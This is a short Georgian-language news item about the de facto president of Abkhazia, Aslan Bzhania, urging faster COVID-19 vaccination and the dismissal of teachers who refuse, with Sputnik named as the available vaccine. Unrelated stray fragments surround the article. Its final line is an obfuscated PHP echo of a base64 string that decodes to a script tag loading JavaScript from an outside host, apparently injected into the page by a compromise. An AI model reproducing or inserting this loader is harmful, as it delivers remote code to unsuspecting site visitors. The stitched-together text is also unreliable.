celsiusi
ავერსი შნაიდერი
აფხაზეთის დე ფაქტო პრეზიდენტმა, ასლან ბჟანიამ აფხაზეთში ვაქცინაციის დაბალი ტემპების შესაებ ისაუბრა და განათლების უწყებების ხელმძღვანელებს დაავალა, პირადად შეადგინონ სკოლების თანამშრომელთა ვაქცინაციის გრაფიკები.
 
“ძალიან დიდ ფულს ვხარჯავთ ამ საქმეზე და ამ პროცესს ორგანიზებას ვერ ვუწევთ. დაავალდებულეთ ყველა მასწავლებელი. არ შეგეშინდეთ, ცუდები გამოჩნდეთ. სწორი პოზიციაა ის, რომ დაითხოვოთ ისინი, ვინც უარს იტყვის ვაქცინაზე”, – განაცხადა ბჟანიამ.
 
აფხაზეთში კორონავირუსის წინააღმდეგ ამჟამად ხელმისაწვდომია რუსული წარმოების ვაქცინა – “სპუტნიკი”.
 
ოფიციალური მონაცემებით, აფხაზეთში პანდემიის დასაწყისიდან კორონავირუსით 600-მდე ადამიანი გარდაიცვალა. ყოველდღიური შემთხვევების მაჩვენებელი კი, საშუალოდ, 100-მდე მერყეობს.
1007
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");